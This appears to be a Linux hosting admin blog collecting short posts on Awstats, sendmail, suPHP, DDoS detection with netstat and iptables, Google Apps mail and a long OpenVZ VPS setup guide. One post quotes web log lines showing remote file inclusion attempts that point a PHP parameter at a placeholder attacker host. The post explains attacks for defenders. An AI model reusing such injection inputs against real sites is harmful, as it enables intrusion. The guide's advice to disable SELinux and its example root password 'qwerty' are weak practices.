Download the Awstats.zip from http://totalchoicehosting.com/downloads/Awstats_Access.zip and unzip
Go to the stats subdirectory and edit the config.php file
Upload the stats directory to your web site, under public_html (creating public_html/stats)
Open a browser to http://www.yoursite.com/stats to logon and view your stats
vi /etc/mail/virtusertable
@domainname.com %1@google.smtp
then
make
make restart
/etc/rc.d/sendmail restart
1. Install RPMForge: http://packages.sw.be/rpmforge-release/rpmforge-release-0.3.6-1.el5.rf.i386.rpm
2. That’ll give you access to a repo to install ffmpeg
3. Then
yum install ffmpeg.i386
and
yum install ffmpeg-devel.i386
URL Injection — attempt to inject / load files onto the server via PHP/CGI vulnerabilities
Sample log report including date and time stamp (1st field is “request”, 2nd field is the IP address or the domain name being attacked, and the 3rd field is the IP address or domain name of the attacker)
Request —– IP attacked —— IP of attacker
————————————————————————————————
Request: xxxx.com 111.222.333.444 – – [19/Apr/2009:08:35:02 -0500] “GET /?custompluginfile[]=http://yyyy.com/images/copyright.txt?? HTTP/1.1” 500 3572 “-” “Mozilla/5.0” SesohkAx1jYAAFNIEg0 “-”
Request: xxxx.com 111.222.333.444 – – [19/Apr/2009:08:35:03 -0500] “GET /fanzine/?custompluginfile[]=http://yyyy.com/images/copyright.txt?? HTTP/1.1” 500 3572 “-” “Mozilla/5.0” Sesoh0Ax1jYAAFN@Eng “-”
————————————————————————————————
Reference from https://support.apthost.com/
What is suPHP is:
On most Apache servers, PHP runs as an Apache module. This is the default method of installation. Many hosts have this setup because it is default and potentially they do not realize that it is also possible to configure PHP as a CGI. Running PHP as a CGI can be more secure whilst also avoiding file and directory ownership issues.
suPHP provides the facility to have all scripts running the relevant user account instead of under the Web Servers account. This facility allows the server Administrators to isolate and manage malicious or runaway script usage very quickly, avoiding unwanted or un-authorized scripts from running for a lengthy period of time. AptHost uses suPHP on all shared, semi-dedicated and reseller hosting servers.
What does suPHP Do?
777 Permissions
With non- suPHP configurations, PHP runs as an Apache Module it executes as the user/group of the webserver which is usually “nobody”, “httpd” or “apache”. Under this mode, files or directories that you require your php scripts to be able to write to need 777 permissions (read/write/execute at user/group/world level). This is not very secure because it allows the webserver to write to the file, it also allows anyone else to read or write to the file.
Under suPHP configurations, PHP running as a CGI with “suexec” enabled (su = switch user, allowing one user to “switch” to another if authorized) – Your php scripts now execute under your own user/group level. Files or directories that you require your php scripts to be able to write to no longer need to have 777 permissions. In fact, 777 permissions are no longer allowed, having 777 permissions on your scripts or the directories they reside in will not run and will instead cause a “500 internal server error” when attempting to execute them, this is done to protect you from someone abusing your scripts. Your scripts and directories can now, only have a maximum of 755 permissions (read/write/execute by you, read/execute by everyone else).
My script requires 777
So what about php scripts that say they require 777 permissions on some of their directory or files to work, such as a Joomla!, Forums, photo galleries and alike? Due to the transparent nature of suPHP this is solved very simply, any directories stated as requiring to be “writable” or “777” can safely be set to 755 (the maximum) instead. This is because, now that the web server runs under your own user account, only your own user account needs full write and execute permissions.
Goodbye “.htaccess” and Welcome “.ini”
Under the old Apache Module mode it was possible to manipulate the PHP settings from within a “.htaccess” file placed in the script’s top-level directory, this was also recursively applied to all other directories below it.
For example you could turn on the php setting “magic_quotes_gpc” with this line in .htaccess:
php_value magic_quotes_gpc on
Now, when PHP is running as a CGI and suPHP protected, manipulating the PHP settings is still possible however you can no longer make use of a “.htaccess” file. Using .htaccess with the required PHP prefix of “php_value” will cause a “500 internal server error” when attempting to access the scripts. This is due to php no longer running as an Apache module, thus Apache is unable to handle those directives any longer.
What is a php.ini file?
The php.ini file is a configuration file that the server looks at to see what PHP options have been made available to the server or what their setting are, if different from the server’s default php.ini. While the name may seem advanced to those unfamiliar with it, it is in essence a simple text file with the name php.ini
How to create a php.ini file
To create a php.ini file, just open up a text editor, add in the lines you need and save the file. You can name the file whatever you wish when saving, to ensure the correct FTP transfer mode is used, you might wish to name it “php.ini.txt”. Once you have configured all your settings, upload the file to the directory where your script is located and then rename it back to php.ini
For example you can turn on the php setting “magic_quotes_gpc” with this line in php.ini:
magic_quotes_gpc = on
In many cases, you might need to have multiple copies of the same php.ini file in different directories, unlike .htaccess files, php.ini files are not applied recursively to lower directories. If you need the same functionality across all lower directries also, you will then need to copy the php.ini file each directory in turn that will have .php scripts running from within them. Click here for a sample php.ini configuration file.
MIMETypes:
If you added a Mimetype to the system in order to run html files as php scripts (AddType as .htaccess command), you will have to remove it and add an ApacheHandler instead. This is easy to do though. Just log into your control panel, then click on Apache Handlers and add the following:
Extension: html (or htm)
Handler: application/x-httpd-php
Protecting your php.ini file:
To protect your php.ini you should set its permissions to 600. Additionally you can add the following line to your .htaccess file:
<Files *.ini>
Order deny,allow
Deny from All
</Files>
Troubleshooting, something went wrong
My php script doesn’t work or I have an error message.
1. Check that the php script that you are attempting to execute has permissions of no more than 755 – 644 will work just fine normally, this is not something that will need to be changed in most cases.
2. Check that the directory permissions that the script resides within is set to a maximum of 755. This also includes directories that the script would need to have access to also.
3. Check that you do not have a .htaccess file with php_values within it. They will cause a 500 Internal server error, when attempting to execute the script.
The php_values will need to be removed from your .htaccess file and a php.ini put in its place, containing the php directives as explained above.
The problem is caused by differences in the way PHP 5.2.x parses code, and can be fixed by manually patching the listContent function in PEAR’s Archive_Tar package.
The fix is to track down the /usr/local/lib/php/Archive/Tar.php and/or /usr/lib/php/Archive/Tar.php files and change the following removing the line marked ‘-‘ and adding the lines marked ‘+’…
function listContent()
{
$v_list_detail = array();
if ($this->_openRead()) {
+ $r = $this->_extractList('', $v_list_detail, "list", '', '');
+ if (!$r) {
- if (!$this->_extractList('', $v_list_detail, "list", '', '')) {
unset($v_list_detail);
$v_list_detail = 0;
}
$this->_close();
}
return $v_list_detail;
}
1. Find.. to which IP address in the server is targeted by the ddos attack
netstat -plan | grep :80 | awk ‘{print $4}’ | cut -d: -f1 |sort |uniq -c
2. Find… from which IPs, the attack is coming
netstat -plan | grep :80 | awk ‘{print $5}’ | cut -d: -f1 |sort |uniq -c
3. Then find the TTL values of the attacking IP addresses
tcpdump -nn -vvv host xxxx |grep yyy (xxxx = ip attacking and yyyy = ip being attacked)
usually we need only tcpdump -nn -vvv host xxxx (as attack is coming from numerous ips)
4. Now block all the ips matching the TTL value obtained from the above script
iptables -A INPUT -p tcp -s 0.0.0.0/0 -d yyyy -m ttl –ttl-eq=zzz -j DROP (zzz is the ttl value)
——————————————————————————————————————-
Install mod security and dos evasive
——————————————————————————————————————-
Harden the sysctl parameters (kernel params) to mitigate the current attack.
Increasing the backlog queue size and decreasing the backlog queuing time might help a bit.
——————————————————————————————————————-
Also install an open source script to prevent DDoS attack to certain extend.
http://deflate.medialayer.com/
MediaLayer was in need of a script to automatically mitigate (D)DoS attacks. The necessity started when MediaLayer was the target of a rather large, consistent attack originating from multiple IP addresses. Each IP would have a large amount of connections to the server, as shown as by:
netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
It became a general practice for us to be blocking IPs with a large amount of connections, but we wanted to get this automated. Zaf created a script mitigate this kind of attack. We kept improving it to meet our own needs and eventually posted it on Defender Hosting’s Forum. (D)DoS-Deflate is now recognized as one of the best ways to block a (D)DoS attack at the software level.
You can view a copy of the license agreement here.
wget http://www.inetbase.com/scripts/ddos/install.sh chmod 0700 install.sh ./install.sh
wget http://www.inetbase.com/scripts/ddos/uninstall.ddos chmod 0700 uninstall.ddos ./uninstall.ddo
Reference : http://deflate.medialayer.com/
grep xxx@xxx.com /var/log/exim_mainlog | grep “<=” | awk {‘print $3’} | wc -l
Create account for your domain in google Apps
****************************************
First of all, create an account for your domain in google Apps. Please follow the link given below for that.
Changing Mx record for your domain
*****************************************
1. Sign in to your hosting account, and go to the MX record maintenance page.
2. MX records may be located in DNS Management, Mail Server Configuration, or Name Server Management. You may have to enable advanced settings to edit your MX records. Delete all existing MX entries.
3. Enter the following MX records.
You may not be able to enter the priority value exactly as it appears in the table below — if you can’t, make sure each record follows the indicated order. If you aren’t able to assign priorities, you should only enter aspmx.l.google.com.. Set any TTL values to 1 Hour (value=3600).
Priority Mail Server
1 ASPMX.L.GOOGLE.COM.
5 ALT1.ASPMX.L.GOOGLE.COM.
Note: ASPMX.L.GOOGLE.COM is the top priority mail server. Don’t assign to any other servers. Learn more about mail server priority. Be sure to include trailing dot (.) at the end of any full-qualified domain names (for example, server.example.com.) if your MX records require this format.
4. Save your changes. Your MX records are now configured to point to Google. Keep in mind that changes to MX records may take up to 48 hours to propagate throughout the Internet.
Adding Cname
*****************
To use the custom URL mail.<domain name> , you must change the CNAME record with your domain host.
Sign in to your domain hosting service.
Navigate to your DNS Management page. The location and name of this page will vary by host, but can generally be found in Domain Management or Advanced Settings.
Find the CNAME settings and enter the following as the CNAME value or alias:
Set the CNAME destination to the following address:
Save changes with your domain host and click “I’ve completed these steps” below.
Verifying the accounts
************************
Verify your domain ownership
Google offer two methods of verification. You can either upload an HTML file with a name we specify, or you can change the CNAME record for your domain using the values we specify. Choose your preferred method below.
htmlverification
Once all these steps are done, you can access the webmail interface for your domain using anyone of the methods given below.
http://google.com/a/<domain name>
http://mail.<domain name>
A virtual private server or virtual dedicated server (VPS or VDS)is a server run through virtualization. It is used to partition a single physical server into many isolated virtual private servers. Each virtual private server looks and behaves exactly like a real networked server system, complete with its own set of init scripts, users, processes, filesystems, etc.,It fills the gap between shared hosting and dedicated hosting.
1.2. What is openvz?
OpenVZ is an operating system-level virtulization technology based on the Linux kernel and operating system. OpenVZ allows a physical server to run multiple isolated operating system instances, known as Virtual Private Servers (VPS) or Virtual Environments (VE).
OpenVZ offers the least flexibility in the choice of operating system: both the guest and host OS must be Linux (although Linux distributions can be different in different VEs). However, OpenVZ’s operating system-level virtulization provides better performance, scalability, density, dynamic resource management, and ease of administration than the alternatives.
OpenVZ kernel is a modified Linux kernel which adds support for Virtual Environments (VE).So it is easy to create and configure a VPS using openvz.
2. Requirements
2.1. Software Requirements
The Hardware Node should run either Red Hat Enterprise Linux 3 or 4, or Fedora Core 3 or 4, or CentOS 3.4 or 4. The detailed instructions on installing these operating systems for the best performance of OpenVZ are provided in the next sections.
This requirement does not restrict the ability of OpenVZ to provide other Linux versions as an operating system for Virtual Private Servers. The Linux distribution installed in a Virtual Private Server may differ from that of the host OS.
2.2. Hardware Requirements
The Hardware Node requirements for the standard 32-bit edition of OpenVZ are the following:
The computer should satisfy the Red Hat Enterprise Linux or Fedora Core hardware requirements.
i)IBM PC-compatible computer.
ii)CPUs: Intel Celeron, Pentium II, Pentium III, Pentium 4, Xeon, or AMD Athlon CPU. The more Virtual Private Servers you plan to run simultaneously, the more CPUs you need.
iii)Memory: Atleast 128 MB of RAM.The more memory you have, the more Virtual Private Servers you can run. The exact figure depends on the number and nature of applications you are planning to run in your Virtual Private Servers. However, on the average, at least 1 GB of RAM is recommended for every 20-30 Virtual Private Servers.
iv)HDD: Atleast 4 GB of free disk space. Each Virtual Private Server occupies 400-600 MB of hard disk space for system files in addition to the user data inside the Virtual Private Server (for example, website content). You should consider it when planning disk partitioning and the number of Virtual Private Servers to run.
v)NIC: Network card will be either Intel EtherExpress100 (i82557-, i82558- or i82559-based) or 3Com(3c905 or 3c905B or 3c595) or RTL8139-based are recommended.
A typical 2-way Dell PowerEdge 1650 1u-mountable server with 1 GB of RAM and 36 GB of hard drives is suitable for hosting 30 Virtual Private Servers.
3.Installation And Configuration
3.1. Pre-Setup
The first step before starting installation is to set up the openvz yum repository.
# cd /etc/yum.repos.d
# wget http://download.openvz.org/openvz.repo
# rpm –import http://download.openvz.org/RPM-GPG-Key-OpenVZ
# yum update
Now create a separate hard disk partition having atleast 4GB of space and mount it in /vz
3.2. Kernel Installation
You can install the kernel using yum. But it will be not good always.
So here you can compile an optimized kernel by yourself.
Before kernel compilation you may need to check the hardware type that installed in your server.
# cat /proc/cpuinfo
This will give you the information about processor.
# lspci
This will give you the list of main other hardwares installed in your system.
Now we can start to build the vps kernel from source. So we need to download a kernel source.
# cd /usr/src
# wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.16.tar.bz2
Now to download the appropriate patch from openvz.
# wget http://download.openvz.org/kernel/devel/026test018.1/patches/patch-026test018-combined.gz
The kernel configs are also available from openvz.
Let us start the buiding…
# tar xvjf linux-2.6.16.tar.bz2
# cd linux-2.6.16
# mv ../patch-026test018-combined.gz
# gzip -dc patch-026test018-combined.gz | patch -p1
# cp ../kernel-2.6.16-026test018-i686-smp.config.ovz .config
# make menuconfig
Now you can select the options depend on your server configuration.
# make all
# make modules_install
# make
# make install
Now the VPS host kernel was successfully compiled and installed. So go to configure the boot loader either (grub or lilo).
3.3. Boot Loader Configuration
If GRUB is used as boot loader, it will configure automatically. Lines similar to following will be added to the grub.conf file.
# cat /boot/grub/grub.conf
Now you can find the following lines in grub.conf
title Fedora Core (2.6.16-026test018)
root (hd0,0)
kernel /vmlinuz-2.6.16-026test018 ro root=LABEL=/ rhgb quiet
initrd /initrd-2.6.16-026test018.img
Now edit this file as follows. (It is not necessary and just for understanding)
# vi /boot/grub/grub.conf
title VPS-openvz(2.6.16-026test018)
root (hd0,0)
kernel /vmlinuz-2.6.16-026test018 ro root=LABEL=/ rhgb quiet panic=5
initrd /initrd-2.6.16-026test018.img
Now set the “default” value to the newly edited image (in most case it will be ‘0’). Then save grub.config.If you are installing a remote server please add the following to the grub.
# grub –no-floppy
grub> savedefault –default=0 –once
grub> quit
Don’t reboot the system now. We must need to configure some more files too.
3.4. Sysctl
We need to set the following contents in sysctl.conf for its good working
# vi /etc/sysctl.conf
Now add the following parameters.
net.ipv4.ip_forward = 1
net.ipv4.conf.default.proxy_arp = 0
net.ipv4.conf.all.rp_filter = 1
kernel.sysrq = 1
net.ipv4.conf.default.send_redirects = 1
net.ipv4.conf.all.send_redirects = 0
3.5. SELinux
SELinux should be disabled.
# vi /etc/sysconfig/selinux
Add the following line to this file.
SELINUX=disabled
3.6. Conntracks
In the stable OpenVZ kernels (those that are 2.6.8-based) netfilter connection tracking for VE0 is disabled by default. If you have a stateful firewall enabled on the host node you should either disable it, or enable connection tracking for VE0.
To enable conntracks for VE0 please edit the file /etc/modprobe.conf
# vi /etc/modprobe.conf
Now add the following.
options ip_conntrack ip_conntrack_enable_ve0=1
In kernels later than 2.6.8, connection tracking is enabled by default.
3.7. Rebooting Into VPS
Now reboot the server. If it is loaded successfully we can proceed to installing the user-level tools for OpenVZ
3.8. Install Utilities
Now we need to install three basic utility packages .
vzctl: it is used to perform different operations on the OpenVZ VPS (eg : create, destroy, start, stop, set parameters etc.)
vzquota: This package is used to manage the VPS quotas.
vzpkg: this package is used to work with OpenVZ templates
Let us install this packages as follows
# yum install vzctl
# yum install vzquota
# yum install vzpkg
Now check the virtual ethernet device
# ifconfig
If it is not there use the following command to make it up.
# ifconfig venet0 up
Now reboot the server
# reboot
3.9. Install OS Templates
Now you need to install at leaset one os template.
# yum install vztmpl-fedora-core
Also you need to download a template package for creating vps .
# cd /vz/template/cache/
# wget http://download.openvz.org/template/precreated/fedora-core-4-i386-default.tar.gz
4. Usages
4.1. Create VPS
First you need to select a vps id. The id 0 is used for the hardware node itself.
# vzlist -a
This command list all the vps in the host.
You can create a vps using the default template or you can define a template package and a configuration. The default creation is as follows,
# vzctl create 101
If you want to create a vps using a OS template as follows
# vzctl create 101 –ostemplate fedora-core-4 -i –config vps.basic
101: is the vp id
fedora-core-4: is the OS template
vps.basic: is the configurations defined in vps.basic.conf
4.2. Configure VPS
Now we need to configure our vps. In this process we need to set up the following parameters.
i) Set the startup parameters
ii) Set the network parameters
iii) Set the root(user) password
So do the following commands in the host server.
# vzctl stop 101
# vzctl set 101 –onboot yes –save
# vzctl set 101 –hostname cyborg.com –save
# vzctl set 101 –ipadd 192.168.1.169 –save
# vzctl set 101 –nameserver 192.168.1.9 –save
# vzctl set 101 –userpasswd root:qwerty
# vzctl start 101
Now our vps will automatically start at the boot time of host. Also it have the host name “cyborg.com” with ip 192.168.1.169 and nameserver 192.168.1.9. The root password was set to “qwerty”. Now do the following
# vzlist -a
VEID NPROC STATUS IP_ADDR HOSTNAME
1 17 running 192.168.1.166 localhost
101 31 running 192.168.1.169 cyborg.com
4.3. Start,Stop and Restart
Now you need to do the following operations in your vps
i) start
ii)stop
iii)restart
iv)status
So run the following commands.
# vzctl stop 101
# vzctl start 101
# vzctl restart 101
# vzctl status 101
In my server it shows the following output.
# vzctl stop 101
Stopping VE …
VE was stopped
VE is unmounted
# vzctl start 101
Starting VE …
VE is mounted
Adding IP address(es): 192.168.1.169
Setting CPU units: 1000
Set hostname: cyborg.com
File resolv.conf was modified
VE start in progress…
# vzctl restart 101
Restarting VE
Stopping VE …
VE was stopped
VE is unmounted
Starting VE …
VE is mounted
Adding IP address(es): 192.168.1.169
Setting CPU units: 1000
Set hostname: cyborg.com
File resolv.conf was modified
VE start in progress…
# vzctl status 101
VEID 101 exist mounted running
4.4. Delete VPS
To delete a vps node we use the “destroy” command.
# vzctl stop 101
# vzctl destroy 101
Now the vps node 101 is deleted.You can check the status of this node. My server give the following output on the status operation.
# vzctl status 101
VPS 101 deleted unmounted down
5. Commands & Tools
5.1. Running Commands In VPS
We can run commands in a VPS through the host using “exec”.
# vzctl exec 101 <comand> </comand>
An example is given below.
# vzctl exec 101 ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
venet0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:127.0.0.1 P-t-P:127.0.0.1 Bcast:0.0.0.0 Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1
RX packets:27 errors:0 dropped:0 overruns:0 frame:0
TX packets:26 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:3118 (3.0 KiB) TX bytes:3720 (3.6 KiB)
venet0:0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:192.168.1.169 P-t-P:192.168.1.169 Bcast:192.168.1.169 Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1
5.2. OS Template Management
In this section we can see the list of cached and other templates.
To list the OS templates in the host please do the following commands.
# vzpkgls
To see the cached templates ,do the folowing
# vzpkgls –cached
To see the template used by a vps do the following,
# vzpkgls 101
The above commands give the following results in my server.
# vzpkgls
fedora-core-4-i386-default
fedora-core-4-i386-minimal
# vzpkgls –cached
fedora-core-4-i386-default
# vzpkgls 101
fedora-core-4-i386-default
5.3. Operations in VPS
To update the vps do the folllowing
# vzyum 101 update
To install a package (eg: php) do the following.
# vzyum 101 install php
To install an rpm(eg: MySQL-shared-3.23.57-1.i386.rpm) from the host ,do it as follows
# vzrpm 101 -ihv MySQL-shared-3.23.57-1.i386.rpm
6. Resource Management
This section is main important . The main goal of resource control in a VPS is to prevent a particular VPS from malicious or accidental usage of hardware resources.
6.1 Configuration Files
We can control the resource through a set of control parameters.All of these parameters placed in the openvz global configuration file or in the respective VPS configuration file.
The global configuration file is located in ” /etc/sysconfig/vz ” and the individual configuration file is located in ” /etc/sysconfig/vz-scripts/VPSID.conf ”
6.2 Disk Quota Management
There are a set of parameters determines disk quota in OpenVZ. The OpenVZ disk quota is realized on two levels:the per-VPS level and the per-user/group level. You can turn on/off disk quota on any level and configure its settings.
The main parameters are DISK_QUOTA, DISKSPACE,DISKINODES, QUOTATIME,QUOTAUGIDLIMIT.
DISK_QUOTA : Indicates whether first-level quotas are on or off for all VPSs or for a separate VPS.If is defined in the global configuration file (GF).
# grep DISK_QUOTA /etc/sysconfig/vz
DISK_QUOTA=yes
DISKSPACE : Total size of disk space the VPS may consume, in 1-Kb blocks.It is defined in the separate configuration file(SF).
# grep DISKSPACE /etc/sysconfig/vz-scripts/101.conf
DISKSPACE=”2000000:2200000″
DISKINODES : Total number of disk inodes (files, directories, and symbolic links) the Virtual Private Server can allocate.It is defined in the separate configuration file(SF).
# grep DISKINODES /etc/sysconfig/vz-scripts/101.conf
DISKINODES=”200000:220000″
QUOTATIME : The grace period for the disk quota overusage defined in seconds. The Virtual Private Server is allowed to temporarily exceed its quota soft limits for no more than the QUOTATIME period.It is defined in SF.
# grep QUOTATIME /etc/sysconfig/vz-scripts/101.conf
QUOTATIME=”0″
QUOTAUGIDLIMIT : Number of user/group IDs allowed for the VPS internal disk quota. If set to 0, the UID/GID quota will not be enabled.It is defined in SF.
Turning on/off per vps disk quota:Now to turning on per vps disk quota do the following.
Edit the separate configuration file
# vi /etc/sysconfig/vz-scripts/101.conf
Add the following,
DISK_QUOTA=yes
If you set the above value to “no”. The quota will be off.
# vzctl restart 101
# vzctl exec 101 df -h
Set up per vps disk quota:Now to set up per vps disk quota(eg : for a nod 102) we need to set up the following parameters DISKSPACE ,DISKINODES ,QUOTATIME
# vzctl set 102 –diskspace 1000000:1100000 –save
# vzctl set 102 –diskinodes 90000:91000 –save
# vzctl set 102 –quotatime 600 –save
# vzctl restart 102
# vzctl exec 102 df -h
Turning On/Off Second-Level Quotas for Virtual Private Server:The parameter that controls the second-level disk quotas is QUOTAUGIDLIMIT in the VPS configuration file. By default, the value of this parameter is zero and this corresponds to disabled per-user/group quotas.
Enabling per-user/group quotas for a Virtual Private Server requires restarting the VPS. The value for it should be carefully chosen; the bigger value you set, the bigger kernel memory overhead this Virtual Private Server creates. This value must be greater than or equal to the number of entries in the VPS /etc/passwd and /etc/group files.
# cat /etc/passwd|wc -l
55
# cat /etc/group|wc -l
66
# vzctl set 102 –quotaugidlimit 100 –save
# vzctl restart 102
Setting Up Second-Level Disk Quota Parameters:first to check the required packages are there in the vps.
# vzctl exec 102 rpm -q quota
Then ssh to the node 102
Now to edit the quota for the root do the following,
# edquota root
To report the quota do the folowing,
# repquota -a
This command gives the following output in my test vps.
# repquota -a
*** Report for user quotas on device /dev/simfs
Block grace time: 00:00; Inode grace time: 00:00
Block limits File limits
User used soft hard grace used soft hard grace
———————————————————————-
root — 455028 0 0 19878 0 0
smmsp — 8 0 0 2 0 0
named — 40 0 0 10 0 0
apache — 8 0 0 2 0 0
rpm — 9472 0 0 75 0 0
mysql — 1332 0 0 163 0 0
To check the quota stats do the following operation in the host server.
# vzquota stat 102 -t
6.3 CPU Sharing
We can set up the cpu utilization of a vps as follows.
# vzcpucheck
# vzctl set 102 –cpuunits 1500 –cpulimit 4 –save
# vzctl restart 102
ServerAdminz Linux Blog 